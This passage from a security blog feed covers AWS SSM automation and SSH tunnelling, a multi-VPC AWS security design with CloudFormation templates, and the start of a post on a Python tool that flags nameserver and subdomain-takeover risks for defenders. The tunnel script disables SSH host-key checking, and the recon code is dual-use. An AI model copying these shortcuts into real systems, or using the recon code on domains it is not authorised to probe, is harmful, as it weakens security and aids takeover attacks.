<!--kg-card-end: markdown--><p>I am using a managed policy for simplicity, but I recommend creating your own policy with limited permissions instead, as most managed policies are too permissive.</p><h2 id="automating-security-tasks-with-ssm">Automating Security Tasks with SSM</h2><p>Now that we have SSM available for instances, let&apos;s create a sample script that we would like to run on a regular basis across all our EC2 instances. To keep the example simple, we will write an Echo automation, which accepts a parameter and echos it into a local text file on the server.</p><p>Since I am using a shell script in this example, you could modify this template to do anything on the server. In the past I have used this method to install or verify installation of security agents, setup logging, audit software, and more.</p><p>First we will create a Document, which defines a single parameter and our shell script (a couple of echo commands).</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  EchoDocument: 
    Type: &quot;AWS::SSM::Document&quot;
    Properties: 
      Name: &quot;SecurityEchoDocument&quot;
      DocumentType: Command
      Content: 
        schemaVersion: &quot;1.2&quot;
        description: &quot;Just echo&apos;s into a file - to show how SSM works. A real document might check security agents, setup logging, or hardening attributes.&quot;
        parameters: 
          valueToEcho: 
            type: &quot;String&quot;
            description: &quot;Just a sample parameter&quot;
            default: &quot;Hello world!&quot;
        runtimeConfig: 
          aws:runShellScript:
            properties:
              - runCommand:
                  - echo &quot;{{ valueToEcho }}&quot; &gt;&gt; ssm.txt
                  - echo &quot;Done with SSM run&quot; &gt;&gt; ssm.txt
</code></pre>
<!--kg-card-end: markdown--><p>Next we will create a maintenance window that defines how frequently and when this should be run. For testing purposes, I want this to be run every 5 minutes:</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  EchoWindow:
    Type: AWS::SSM::MaintenanceWindow
    Properties: 
      AllowUnassociatedTargets: true
      Cutoff: 1
      Description: Run Echo documents - our sample automation
      Duration: 4
      Name: PatchWindow
      Schedule: cron(*/5 * * * ? *) # Every 5 mintues for this test. Probably not what you would really want!
</code></pre>
<!--kg-card-end: markdown--><p>Then, I create a grouping to execute the script on target instances. Here, it is based on tags specifically created for this task. We don&apos;t have to use tags, but I find it a simple way to group servers into sets based on automation documents targeting their risk level, OS, or something else.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  EchoTargets:
    Type: AWS::SSM::MaintenanceWindowTarget
    Properties: 
      Description: Add our server into the maintenance window
      Name: EchoTargets
      ResourceType: INSTANCE
      Targets: 
      - Key: tag:ShouldEcho
        Values: 
        - True
      WindowId: !Ref EchoWindow
</code></pre>
<!--kg-card-end: markdown--><p>Finally, we will tie this all together with a task. The task will link the targets to a window, and execute the document within the window schedule.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml"> EchoTask:
  Type: AWS::SSM::MaintenanceWindowTask
  Properties: 
    Description: Echo data on the machine
    MaxConcurrency: 3
    MaxErrors: 1
    Name: EchoTask
    Priority: 5
    Targets: 
    - Key: WindowTargetIds
      Values: 
      - !Ref EchoTargets
    TaskArn: !Ref EchoDocument
    TaskType: RUN_COMMAND
    TaskInvocationParameters:
      MaintenanceWindowRunCommandParameters:
        Parameters:
          valueToEcho:
            - &quot;Hello World from the maintenance window!&quot;
    WindowId: !Ref EchoWindow
</code></pre>
<!--kg-card-end: markdown--><p>We&apos;re done with the SSM setup and automation creation now! Any servers tagged with with ShouldEcho == True will now have our Echo script run on them every 5 minutes. But we haven&apos;t actually created that server yet, so let&apos;s do that next.</p><h2 id="create-an-ec2-server-with-ssm">Create an EC2 Server With SSM</h2><p>Let&apos;s build that EC2 instance and leverage SSM on it. You should also build a tightly scoped IAM role for this instance. In an enterprise environment, you may have broader groups and scopes that dictate access, so be cautious: It is somewhat easy to over-provision access with this method. </p><p>If you grant a role <code><code>ssm:StartSession</code></code> or <code>ssm:ResumeSession</code> on <code>resource:*</code>, then that role will be able to login as root to all SSM enabled servers! (This is a good time to note that when I am peer reviewing IAM templates, any usage of <code>resource:*</code> gets flagged for close scrutiny: it is rarely what you really want when paired with <code>Allow</code> directives).</p><p>Instead, grant a role with a tightly scoped resource. I tend to use name-spacing, where assets are prefixed with an application ID and environment (Dev/Prod/etc), and then scope with <code>resource:&lt;arn-prefix&gt;-&lt;application-ID&gt;-&lt;environment&gt;-*</code>. However in this example I don&apos;t create any such role and am using an admin user for simplicity.</p><p>In the examples, I am using Amazon Linux 2, which comes with an SSM agent installed by default. If you are using an AMI which is does not include the agent, you will need to add a provisioning step to install the agent. More can be found in the <a href="https://docs.aws.amazon.com/systems-manager/latest/userguide/setup-launch-managed-instance.html?ref=nullsweep.com">AWS documentation on SSM agents</a>.</p><p>I also include a security group that does not open port 22 for SSH access. Instead, the server only allows traffic in on port 443, for encrypted HTTP, and all outbound traffic.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  SimpleServer:
    Type: AWS::EC2::Instance
    DependsOn: SSMProfile
    Properties:
      InstanceType: t3.micro
      SecurityGroupIds:
      - Ref: WebSecurityGroup
      IamInstanceProfile: !Ref SSMProfile
      ImageId: !Ref AMIID
      Tags: 
        - Key: ShouldEcho
          Value: True
      SsmAssociations:
        - AssociationParameters: 
            - Key: valueToEcho
              Value: 
                - &quot;Hello World from CloudFormation initialization!&quot;
          DocumentName: !Ref EchoDocument

  WebSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupDescription: Enable encrypted HTTP traffic only (in/out)
      VpcId: !Ref VpcId
      SecurityGroupIngress:
      - IpProtocol: tcp
        FromPort: &apos;443&apos;
        ToPort: &apos;443&apos;
        CidrIp: 0.0.0.0/0
</code></pre>
<!--kg-card-end: markdown--><h2 id="putting-it-all-together">Putting It All Together</h2><p>Our template is now complete. Not shown here, but present in github, is an RDS instance as well. Run it in an AWS environment using the AWS CLI.</p><!--kg-card-begin: markdown--><pre><code class="language-bash">aws cloudformation create-stack --stack-name ssm --template-body file://ssm.yaml --capabilities CAPABILITY_NAMED_IAM
</code></pre>
<!--kg-card-end: markdown--><p>You can now use the console to get a few more pieces of information about what was provisioned:</p><ul><li>The instance name, AZ, and other details from the EC2 panel</li><li>The DB master password from the Secret Manager panel</li><li>The RDS postgres instance URL from the RDS panel.</li><li>The Session Manager to view automation documents and start an SSH session from your browser.</li></ul><p>Finally, we can use the console to add the group to patch manager. Now, every time the window comes up, AWS will also try to patch the instances with the latest security patches.</p><h2 id="a-better-way-to-ssh-on-aws-and-tunnel-to-rds-">A Better way to SSH on AWS (and tunnel to RDS)</h2><p>Now that everything is provisioned and you have gathered your information, let&apos;s SSH into our simple server, even though we didn&apos;t open port 22. In the console, navigate to systems manager, then Session Manager, and select the instance, then click start session. You&apos;ll get a console window with root access!</p><p>Alternately, and my preference, you can use the command line by installing a plugin to the AWS CLI and following the <a href="https://globaldatanet.com/blog/ssh-and-scp-with-aws-ssm/?ref=nullsweep.com">AWS guide on SSH</a>. Here, I SSH into the instance and verify that the automation Echo document we created is being executed and passed the parameters we defined.</p><!--kg-card-begin: markdown--><pre><code class="language-bash">aws ssm start-session --target i-01cbc9a20ce113029 --document-name AWS-StartSSHSession
...
sh-4.2$ ls -al ssm.txt
-rw-r--r-- 1 root root 132 Feb 19 17:16 ssm.txt
sh-4.2$ id
uid=1001(ssm-user) gid=1001(ssm-user) groups=1001(ssm-user)
sh-4.2$ cat ssm.txt
Hello World from CloudFormation initialization!
Done with SSM run
Hello World from CloudFormation initialization!
Done with SSM run
.... wait ~5 minutes...
sh-4.2$ cat ssm.txt
Hello World from CloudFormation initialization!
Done with SSM run
Hello World from CloudFormation initialization!
Done with SSM run
Hello World from the maintenance window!
Done with SSM run
</code></pre>
<!--kg-card-end: markdown--><p>We can also leverage SSM to port forward from our local machine to an RDS instance that is only accessible to the EC2. SSM does require a bit of extra work to get the tunnel working unfortunately. </p><p>To complete this example, you will need the AWS CLI and SSM plugin, a local postgres client (psql), and an SSH client. You can get the DB password by logging into the AWS console and retrieving the secret from the Secrets Manger service.</p><p>Below is a script that does a few things to setup our tunnel to the RDS instance:</p><ol><li>Temporarily (for 60 seconds) puts a public key on the EC2 instance (it creates a temporary keypair in the current directory)</li><li>Connect to the instance using the private key, and put the tunnel in a socket file (temp-ssh.sock)</li><li>Wait for the user to press a key, then close the connection.</li></ol><!--kg-card-begin: markdown--><pre><code class="language-bash">ssh-keygen -t rsa -f temp -N &apos;&apos;
aws ec2-instance-connect send-ssh-public-key --instance-id i-07cec3c515bcb2e61 --availability-zone us-east-1b --instance-os-user ssm-user --ssh-public-key file://temp.pub
ssh -i temp -N -f -M -S temp-ssh.sock -L 3306:echodb-dev.cju92986bx4i.us-east-1.rds.amazonaws.com:5432 ssm-user@i-07cec3c515bcb2e61 -o &quot;UserKnownHostsFile=/dev/null&quot; -o &quot;StrictHostKeyChecking=no&quot; -o ProxyCommand=&quot;aws ssm start-session --target %h --document-name AWS-StartSSHSession --parameters portNumber=%p&quot;
read -rsn1 -p &quot;Press any key to close session.&quot;; echo
ssh -O exit -S temp-ssh.sock *
rm temp*
</code></pre>
<!--kg-card-end: markdown--><p>Of course, this script leaves a lot to be desired - it hard codes the instance name, keyfile, AZ, etc. It should be used as a starting point for a more robust script. Once the press any key message appears, in a separate window we can connect to our instance with psql:</p><!--kg-card-begin: markdown--><pre><code class="language-bash">$ psql -h localhost -p 3306 -U master postgres
Password for user master: 
psql (12.2 (Ubuntu 12.2-1.pgdg19.10+1), server 10.6)
SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)
Type &quot;help&quot; for help.

postgres=&gt; \q
</code></pre>
<!--kg-card-end: markdown--><p>Hitting any key on the original window will close the session and remove the socket file.</p><h2 id="conclusions">Conclusions</h2><p>We have built a complete management solution for a typical EC2/RDS architecture without exposing any SSH ports. We restricted the database to only allow connections from servers that will interact with it (no bastion!). We also setup an automation document that can be expanded upon to complete all sorts of automated security tasks on our server fleet.</p><p>This gives us improved SSH security at a lower cost and overall simpler architecture and security group layout.</p><p>I&apos;d love to hear from the community on what great automation you have done with SSM!</p>]]></content:encoded></item><item><title><![CDATA[Advanced AWS Security Architecture]]></title><description><![CDATA[A series of articles implementing advanced security controls on AWS, leveraging build in aws security tooling and security best practices.]]></description><link>https://nullsweep.com/advanced-aws-security-architecture/</link><guid isPermaLink="false">5dde6290ab3deb04f38743ff</guid><category><![CDATA[Technical Guides]]></category><category><![CDATA[AWS]]></category><category><![CDATA[DevSecOps]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Sat, 11 Jan 2020 12:40:20 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1503387837-b154d5074bd2?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1503387837-b154d5074bd2?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="Advanced AWS Security Architecture"><p>Most articles on AWS security rightfully spend a lot of time talking about the basics, such as setting up minimized IAM roles, encrypting data, and basic monitoring. It is more difficult to find guidance and specific implementation recommendations on advanced, automated security configurations.</p><p>In this series of articles, I will be outlining advanced security architecture for large AWS deployments. This is the kind of stuff I wished had been laid out for me when I started securing our cloud environments, and had to learn on my own.</p><p>It&apos;s also not enough to just show you the architectural layouts I recommend - I&apos;ll be diving deep to make sure the concepts, trade offs, and implementation details are clear.</p><p>To that end, for each component, I will look at the security goals, the architecture and concepts, and finally a specific implementation example with CloudFormation templates, where I will call out what should change for actual implementations (Everything here is designed for testing on a free personal account)</p><p>By the end of the series, you will have an application VPC to host business applications in, and a logically separate security VPC to aggregate data of interest such as logs, incident information, configurations, and an automated framework to analyze and respond to these items.</p><p>Since this is a large and complicated topic, I have broken it out into the following planned series of articles, building up the infrastructure and explaining it piece by piece.</p><ol><li>A Multi-VPC security strategy (this article)</li><li><a href="https://nullsweep.com/a-better-way-to-ssh-in-aws/">Using Session Manager to automate patching, secure SSH, and automated security agent installs.</a></li><li>Leveraging and centralizing AWS security tools with SecurityHub.</li><li><a href="https://nullsweep.com/centralized-security-logging-in-aws/">Aggregating and analyzing logs for security.</a></li><li>Building centralized compliance and security monitoring of infrastructure with Config, the Compliance Engine, and Rule Development Kit.</li></ol><h1 id="aws-security-basics">AWS Security Basics</h1><p>I won&apos;t go in depth here about setting up basic security, as this is a well covered topic. If the team isn&apos;t solid on the basics, it would pay better dividends to develop practices and procedures to put them in place before moving on to building out the advanced security components.</p><p>Many cloud security incidents are the result of mis-configurations, where sensitive data is inadvertently exposed to the internet without controls. These controls are largely about preventing, and detecting those possibilities.</p><p>In brief, be sure to have:</p><ul><li>IAM practices that ensure minimal security groups, roles, and groups, along with a change management process for modifying these items.</li><li>A solid patching strategy for any OS&apos;s, software, and platforms where Amazon doesn&apos;t take the lead.</li><li>A NACL / network firewall strategy and review process, along with a solid understanding of what might make a service open to the internet vs. internal users.</li><li>Similar to the above, a good understanding of bucket policies, and a review process to catch public buckets (We&apos;ll automate this later).</li><li>Solid secure development practices with a focus on cloud native architectures.</li></ul><h2 id="multi-vpc-security-architecture">Multi VPC Security Architecture</h2><p>Many teams start their cloud journey with a single VPC where all applications, logs, and data are stored. This is sub-optimal from a security perspective because if the VPC itself should be compromised, so are many of the security controls we depend on as security professionals.</p><p>Therefore, I prefer to have a separate, dedicated VPC for security, which will constantly be monitoring the application VPC. As the business scales and adds additional VPC&apos;s, it is simple to roll out and centralize the same controls across all business environments, while keeping security analysts and data in a single place for all their work.</p><p>Eventually, we will have something like the below, with any number of application VPC&apos;s reporting back.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/01/aws_arch_diagram.png" class="kg-image" alt="Advanced AWS Security Architecture" loading="lazy"><figcaption>Advanced AWS security architecture</figcaption></figure><p>The key elements of this architecture is that all relevant information for security monitoring and incident analysis is stored in the security VPC. We can drain any number of other logs (sysmon, syslog, apache, etc) via the cloudwatch drain shown.</p><p>Note that this is a high level diagram, and does not show every service that will need to be leveraged to complete this setup - only the critical components to illustrate what we are trying to accomplish and the core AWS services we will be leveraging, When we implement each of these, I&apos;ll talk about each component in detail. The core services will be:</p><ul><li><strong>Security Hub</strong> to centralize and view mis-configurations and potential incidents that Amazons internal tools have detected</li><li><strong>Config</strong> to track all infrastructure configuration changes, and validate them against policies, such as requiring S3 bucket encryption at rest.</li><li><strong>Session Manager</strong> to automate patching, configuration of common tooling, and SSH (instead of a bastion)</li><li><strong>CloudWatch</strong> to aggregate logs from many services and store them in our security VPC. We could easily add log analysis tools at this phase.</li></ul><h2 id="setting-up-an-application-and-security-account">Setting up an application and security account</h2><p>I have attempted to keep everything we build to minimal cost, expecting it to be built in a free tier personal account. Some of the stacks do carry charges (usually less than $1/hour for any examples shown in this series), so be sure to delete stacks as soon as you are done testing to minimize costs.</p><p>To follow along, you&apos;ll need a free AWS account, with an IAM user capable of managing organizations and accounts (I don&apos;t recommend using the root user for anything more than creating an admin user).</p><p>We will be creating separate accounts for each function. If you created a new AWS account, you first have to change it to an organization - go to the drop-down under your admin user name, and select <code>My Organization</code>.</p><p>Go through the steps of creating an application account, and a security account. The root account (the one that was initially created) can now be reserved only for management of the sub accounts. Because this master account has access to everything, it should be completely locked down (MFA on all logins, severely restricted list of who has any access, regular audits of activity, and perhaps more).</p><p>Securing the master account is a little outside the scope of this series, because you may want to include non-AWS protective measures to protect against internal threat actors, as well as the normal external actors. This account also is generally used to manage all billing for an organization, and may require other special considerations.</p><p>For each sub account, create an admin user with access keys who will be able to build infrastructure.</p><h2 id="building-the-vpc-s-within-each-account">Building the VPC&apos;s within each account</h2><p>We&apos;re finally ready to create the actual VPC&apos;s we&apos;ll be building in. I am basing the templates on <a href="https://docs.aws.amazon.com/codebuild/latest/userguide/cloudformation-vpc-template.html?ref=nullsweep.com">this sample vpc creation template</a> found in the AWS documentation with a few minor changes.</p><p>Both VPC&apos;s include an internet gateway and public subnets, to allow internal resources to reach out to the internet for things like patches, but no traffic is currently allowed from the internet to our VPC&apos;s. </p><p>In a production situation, you might use a <a href="https://docs.aws.amazon.com/vpc/latest/userguide/vpn-connections.html?ref=nullsweep.com">VPN gateway</a> or <a href="https://docs.aws.amazon.com/directconnect/latest/UserGuide/Welcome.html?ref=nullsweep.com">direct connect </a>when setting up ingress routes to avoid any internet traffic for internal applications and especially for our security account.</p><p>Here is a sample cloud formation template for building out a basic VPC. You can find these templates, along with all the samples shown in this series, in my <a href="https://github.com/Charlie-belmer/advanced_aws_security_infrastructure?ref=nullsweep.com">github</a>:</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">AWSTemplateFormatVersion: &quot;2010-09-09&quot;
Description:  This template deploys an application VPC, with a pair of public and private subnets spread
  across two Availability Zones. It deploys an internet gateway, with a default
  route on the public subnets. It deploys a pair of NAT gateways (one in each AZ),
  and default routes for them in the private subnets.

Parameters:
  EnvironmentName:
    Description: An environment name that is prefixed to resource names
    Type: String
    Default: &quot;lab&quot;

  VPCName:
    Description: A friendly name to refer to this VPC
    Type: String
    Default: &quot;Application&quot;

  VpcCIDR:
    Description: IP range (CIDR notation) for the application VPC
    Type: String
    Default: 10.11.0.0/16

  PublicSubnet1CIDR:
    Description: Please enter the IP range (CIDR notation) for the public subnet in the first Availability Zone
    Type: String
    Default: 10.11.10.0/24

  PublicSubnet2CIDR:
    Description: Please enter the IP range (CIDR notation) for the public subnet in the second Availability Zone
    Type: String
    Default: 10.11.11.0/24

  PrivateSubnet1CIDR:
    Description: Please enter the IP range (CIDR notation) for the private subnet in the first Availability Zone
    Type: String
    Default: 10.11.20.0/24

  PrivateSubnet2CIDR:
    Description: Please enter the IP range (CIDR notation) for the private subnet in the second Availability Zone
    Type: String
    Default: 10.11.21.0/24


Resources:
  VPC:
    Type: AWS::EC2::VPC
    Properties:
      CidrBlock: !Ref VpcCIDR
      EnableDnsSupport: true
      EnableDnsHostnames: true
      InstanceTenancy: &quot;default&quot; # I recommend setting to dedicated for sensitive workloads.
      Tags:
        - Key: Name
          Value: !Ref VPCName
        - Key: Environment
          Value: !Ref EnvironmentName

  InternetGateway:
    Type: AWS::EC2::InternetGateway
    Properties:
      Tags:
        - Key: Name
          Value: !Sub &quot;${EnvironmentName}-${VPCName}-InternetGateway&quot;
        - Key: Environment
          Value: !Ref EnvironmentName

  InternetGatewayAttachment:
    Type: AWS::EC2::VPCGatewayAttachment
    Properties:
      InternetGatewayId: !Ref InternetGateway
      VpcId: !Ref VPC

  PublicSubnet1:
    Type: AWS::EC2::Subnet
    Properties:
      VpcId: !Ref VPC
      AvailabilityZone: !Select [ 0, !GetAZs &apos;&apos; ]
      CidrBlock: !Ref PublicSubnet1CIDR
      MapPublicIpOnLaunch: true
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Public Subnet (AZ1)

  PublicSubnet2:
    Type: AWS::EC2::Subnet
    Properties:
      VpcId: !Ref VPC
      AvailabilityZone: !Select [ 1, !GetAZs  &apos;&apos; ]
      CidrBlock: !Ref PublicSubnet2CIDR
      MapPublicIpOnLaunch: true
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Public Subnet (AZ2)

  PrivateSubnet1:
    Type: AWS::EC2::Subnet
    Properties:
      VpcId: !Ref VPC
      AvailabilityZone: !Select [ 0, !GetAZs  &apos;&apos; ]
      CidrBlock: !Ref PrivateSubnet1CIDR
      MapPublicIpOnLaunch: false
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Private Subnet (AZ1)

  PrivateSubnet2:
    Type: AWS::EC2::Subnet
    Properties:
      VpcId: !Ref VPC
      AvailabilityZone: !Select [ 1, !GetAZs  &apos;&apos; ]
      CidrBlock: !Ref PrivateSubnet2CIDR
      MapPublicIpOnLaunch: false
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Private Subnet (AZ2)

  NatGateway1EIP:
    Type: AWS::EC2::EIP
    DependsOn: InternetGatewayAttachment
    Properties:
      Domain: vpc

  NatGateway2EIP:
    Type: AWS::EC2::EIP
    DependsOn: InternetGatewayAttachment
    Properties:
      Domain: vpc

  NatGateway1:
    Type: AWS::EC2::NatGateway
    Properties:
      AllocationId: !GetAtt NatGateway1EIP.AllocationId
      SubnetId: !Ref PublicSubnet1

  NatGateway2:
    Type: AWS::EC2::NatGateway
    Properties:
      AllocationId: !GetAtt NatGateway2EIP.AllocationId
      SubnetId: !Ref PublicSubnet2

  PublicRouteTable:
    Type: AWS::EC2::RouteTable
    Properties:
      VpcId: !Ref VPC
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Public Routes

  DefaultPublicRoute:
    Type: AWS::EC2::Route
    DependsOn: InternetGatewayAttachment
    Properties:
      RouteTableId: !Ref PublicRouteTable
      DestinationCidrBlock: 0.0.0.0/0
      GatewayId: !Ref InternetGateway

  PublicSubnet1RouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Properties:
      RouteTableId: !Ref PublicRouteTable
      SubnetId: !Ref PublicSubnet1

  PublicSubnet2RouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Properties:
      RouteTableId: !Ref PublicRouteTable
      SubnetId: !Ref PublicSubnet2


  PrivateRouteTable1:
    Type: AWS::EC2::RouteTable
    Properties:
      VpcId: !Ref VPC
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Private Routes (AZ1)

  DefaultPrivateRoute1:
    Type: AWS::EC2::Route
    Properties:
      RouteTableId: !Ref PrivateRouteTable1
      DestinationCidrBlock: 0.0.0.0/0
      NatGatewayId: !Ref NatGateway1

  PrivateSubnet1RouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Properties:
      RouteTableId: !Ref PrivateRouteTable1
      SubnetId: !Ref PrivateSubnet1

  PrivateRouteTable2:
    Type: AWS::EC2::RouteTable
    Properties:
      VpcId: !Ref VPC
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Private Routes (AZ2)

  DefaultPrivateRoute2:
    Type: AWS::EC2::Route
    Properties:
      RouteTableId: !Ref PrivateRouteTable2
      DestinationCidrBlock: 0.0.0.0/0
      NatGatewayId: !Ref NatGateway2

  PrivateSubnet2RouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Properties:
      RouteTableId: !Ref PrivateRouteTable2
      SubnetId: !Ref PrivateSubnet2

  # Here is where we might setup ingress for SSH or a bastion host. For now, no ingress allowed 
  NoIngressSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupName: &quot;no-ingress-sg&quot;
      GroupDescription: &quot;Security group with no ingress rule&quot;
      VpcId: !Ref VPC
      ```</code></pre>
<!--kg-card-end: markdown--><p>We will build this twice - one VPC in our security account, one in our app account. To build this, you will need the access keys created earlier for both accounts. I assume you have stored one set of security keys during aws configure.</p><!--kg-card-begin: markdown--><pre><code class="language-bash">$ aws cloudformation create-stack --stack-name security-vpc --template-body file://security_vpc.yaml
$ export AWS_ACCESS_KEY_ID=AAAAAAAAAAAAAAA
$ export AWS_SECRET_ACCESS_KEY=BBBBBBBBBBBBBBBBBBBBBBB
$ aws cloudformation create-stack --stack-name application-vpc --template-body file://application_vpc.yml
</code></pre>
<!--kg-card-end: markdown--><p>You should now be able to view VPC information in the console.</p><h2 id="conclusions">Conclusions</h2><p>This seems like a good stopping point for this step. We have setup our initial account structure and admin users, and built a VPC in each account to host our information.</p><p>In the next section, we will setup SSH access to EC2, and automate control installation. From there, we will move into log centralization and automated controls</p><p>What else have you used to secure your AWS environments? Amazon is constantly coming out with new tools, so there are at least a few that I haven&apos;t touched on (yet!)</p>]]></content:encoded></item><item><title><![CDATA[Subdomain_recon.py: A SubDomain Reconnaissance Tool]]></title><description><![CDATA[A tool to search for subdomain and nameserver takeover risks across an organization, written in python.]]></description><link>https://nullsweep.com/subdomain-recon-a-subdomain-reconnaissance-tool/</link><guid isPermaLink="false">5dcebeddab3deb04f38742cf</guid><category><![CDATA[Pentesting]]></category><category><![CDATA[Technical Guides]]></category><category><![CDATA[osint]]></category><category><![CDATA[appsec]]></category><category><![CDATA[Tools]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Sun, 17 Nov 2019 13:28:43 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1542410613-d073472c3135?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1542410613-d073472c3135?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="Subdomain_recon.py: A SubDomain Reconnaissance Tool"><p>Recently I participated in a hackathon building tools to help the blue team inventory our external attack surface. We are a large business with many global locations, datacenters, and devices, built up over time and via acquisition, so there is a lot to search for, and our internal inventories don&apos;t always keep up.</p><p>I decided to search for subdomain takeover and nameserver takeover risks across our infrastructure, and automate a way to maintain it going forward.</p><p>To accomplish this, I wrote a script to do the following:</p><ul><li>Check for any unregistered nameservers in the domain chain to search for domain takeover attack opportunities.</li><li>Try to find all known subdomains of a given domain, using the excellent <a href="https://dnsdumpster.com/?ref=nullsweep.com">DNSDumpster</a>.</li><li>Screenshot each subdomain for a quick visual inspection.</li><li>Collect shodan data for each subdomain infrastructure item found.</li><li>Write everything to an HTML report.</li></ul><h2 id="the-subdomain_recon-py-tool">The subdomain_recon.py Tool</h2><p>I recreated this script for general use and put it on my <a href="https://github.com/Charlie-belmer/subdomain_recon?ref=nullsweep.com">github</a>.</p><p>Here is the script running against this website:</p><!--kg-card-begin: markdown--><pre><code class="language-bash">$ python subdomain_recon.py nullsweep.com
Checking nullsweep.com for subdomains and takeover opportunities...
Searching for unregistered name servers...
Checking name server f.gtld-servers.net. for com....
Checking name server j.gtld-servers.net. for com....
Checking name server i.gtld-servers.net. for com....
Checking name server a.gtld-servers.net. for com....
Checking name server h.gtld-servers.net. for com....
Checking name server l.gtld-servers.net. for com....
Checking name server g.gtld-servers.net. for com....
Checking name server b.gtld-servers.net. for com....
Checking name server e.gtld-servers.net. for com....
Checking name server m.gtld-servers.net. for com....
Checking name server c.gtld-servers.net. for com....
Checking name server k.gtld-servers.net. for com....
Checking name server d.gtld-servers.net. for com....
Checking name server josh.ns.cloudflare.com. for nullsweep.com....
Checking name server lara.ns.cloudflare.com. for nullsweep.com....
Searching for subdomains...
[verbose] Retrieved token: 4FhdLcwZDOwnpCqOXp5gzgVDzuz6Bv47v03z5eGUmc3J0L3yhEgSNMCRzxuIxZbE
list index out of range
	Found 3 subdomains
Wrote report to nullsweep.com.html
</code></pre>
<!--kg-card-end: markdown--><p>And a screenshot of the report. Shodan got my open ports wrong, probably because I am using CloudFlare:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2019/11/nullsweep_domain_report.png" class="kg-image" alt="Subdomain_recon.py: A SubDomain Reconnaissance Tool" loading="lazy"><figcaption>subdomain_recon report against nullsweep</figcaption></figure><h2 id="nameserver-takeover">NameServer Takeover</h2><p>For an excellent dive into nameserver takeover risks, I recommend reading the hackerblog entry <a href="https://thehackerblog.com/respect-my-authority-hijacking-broken-nameservers-to-compromise-your-target/?ref=nullsweep.com">Hijacking Broken Nameservers to Compromise Your Target</a></p><p>In this script, I iterate through each component of a domain name and list the nameservers for that component. For nullsweep.com, this breaks down into finding nameservers for the &quot;.com&quot; and &quot;nullsweep.com&quot; domains. Sites that have longer chains like mysite.hostingsite.region.com would have checks for &quot;.com&quot;, &quot;.region.com&quot;, &quot;hostingsite.region.com&quot; and &quot;mysite.hostingsite.region.com&quot;, each of which may use different name servers.</p><p>For each name server found, we check it&apos;s registration status.</p><!--kg-card-begin: markdown--><pre><code class="language-python">def list_ns(domain):
    &apos;&apos;&apos; Return a list of name servers for the given domain&apos;&apos;&apos;
    q = dns.message.make_query(domain, dns.rdatatype.NS)
    r = dns.query.udp(q, name_server)
    if r.rcode() == dns.rcode.NOERROR and len(r.answer) &gt; 0:
        return r.answer[0].items
    return []


def get_ns_registration_status(domain, depth=2):
    &apos;&apos;&apos; Check registration status of all name servers.
    Depth of 2 will check TLD&apos;s such as .com or .info,
    3 or higher skips TLD
    &apos;&apos;&apos;
    domain = dns.name.from_text(domain)
    done = False
    nameservers = {}
    while not done:
        s = domain.split(depth)

        done = s[0].to_unicode() == u&apos;@&apos;
        subdomain = s[1]

        nss = list_ns(subdomain)
        for ns in nss:
            print(f&quot;Checking name server {ns} for {subdomain}...&quot;)
            nameservers[ns.to_text()] = &quot;registered&quot;
            if can_register(ns):
                nameservers[ns.to_text()] = &quot;UNREGISTERED&quot;
        depth += 1
    return nameservers
</code></pre>
<!--kg-card-end: markdown--><h1 id="find-all-subdomains">Find all Subdomains</h1><p>There are tons of great tools out there for doing DNS busting (brute forcing DNS and attempting zone transfers), but I wanted to use a service. Out of all the subdomain search tools I sampled, <a href="https://dnsdumpster.com/?ref=nullsweep.com">DNSDumpster</a> had by far the best results, even if sometimes they were out of date. Even better, they have an (unofficial) python package.</p><p>Finding all subdomains is as simple as quering the service:</p><!--kg-card-begin: markdown--><pre><code class="language-python">def find_subdomains(domain):
    results = DNSDumpsterAPI({&apos;verbose&apos;: True}).search(domain)
    subdomains = [domain_details(domain)]
    if len(results) &gt; 0:
        subdomains.extend(results[&apos;dns_records&apos;][&apos;host&apos;])
    return subdomains
</code></pre>
